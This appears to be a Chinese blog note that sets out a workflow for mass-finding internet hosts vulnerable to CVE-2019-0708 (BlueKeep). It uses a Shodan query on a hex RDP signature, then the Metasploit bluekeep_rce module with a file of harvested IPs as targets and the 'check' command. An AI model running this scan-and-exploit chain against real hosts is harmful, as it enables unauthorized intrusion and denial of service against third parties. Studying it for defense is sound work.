当前位置: 首页 > news >正文

shodan2-批量查找CVE-2019-0708漏洞

声明!
学习视频来自B站up主 泷羽sec 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!

目录

  • 批量查找CVE-2019-0708漏洞
    • 简述:

批量查找CVE-2019-0708漏洞

简述:

漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,导致机器蓝屏瘫痪。

输入命令:

shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

用16进制是因为shodan search vuln:cve -2019-0708 命令对于学术账号无权限使用,需要注册更高一级账户

查到ip和对应端口后,通过 shodan host ip 来验证是否存在该漏洞,如下所示,这个ip则存在CVE-2019-0708漏洞


扫描下来的ip可以放到文档里(注意把端口删掉),利用windows自带远程桌面连接尝试连接


回到kali,输入msfconsole,再输入search 0708 查找此漏洞

输入以下命令启用这个模块

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

输入show options显示选项


然后输入 set rhosts file: 上述存放ip的文档路径

这里可以直接把文件托进命令面板


再输入check检查,带* 号的不能利用,带+号的可以利用


输入show targets可以查看利用的版本


输入exit退出

http://www.lryc.cn/news/496990.html

相关文章:

  • 面向对象(二)——类和对象(上)
  • Redis3——线程模型与数据结构
  • linux 获取公网流量 tcpdump + python + C++
  • C++知识整理day3类与对象(下)——赋值运算符重载、取地址重载、列表初始化、友元、匿名对象、static
  • pytest(二)excel数据驱动
  • python蓝桥杯刷题3
  • 基于PySpark 使用线性回归、随机森林以及模型融合实现天气预测
  • Day 30 贪心算法 part04
  • dns实验3:主从同步-完全区域传输
  • 数据结构 (20)二叉树的遍历与线索化
  • 【docker】Overlay网络
  • 基于智能语音交互的智能呼叫中心工作机制
  • Linux条件变量线程池详解
  • 有趣的Docker
  • 深入探讨锁升级问题
  • MySQL篇—通过官网下载linux系统下多种安装方式的MySQL社区版软件
  • 6.824/6.5840(2024)环境配置wsl2+vscode
  • 【乐企文件生成工程】搭建docker环境,使用docker部署工程
  • 常见的数据结构---队列、树与堆的深入剖析
  • leetcode--螺旋矩阵
  • JavaScript(JS)的对象
  • 基于BM1684的AI边缘服务器-模型转换,大模型一体机
  • git推送多个仓库
  • Matlab mex- setup报错—错误使用 mex,未检测到支持的编译器...
  • PostgreSQL认证培训需要什么条件
  • Oracle—系统包使用
  • 【排序用法】.NET开源 ORM 框架 SqlSugar 系列
  • 【SpringBoot】整合篇
  • 写入json和读取json文件
  • Vuex的理解及使用场景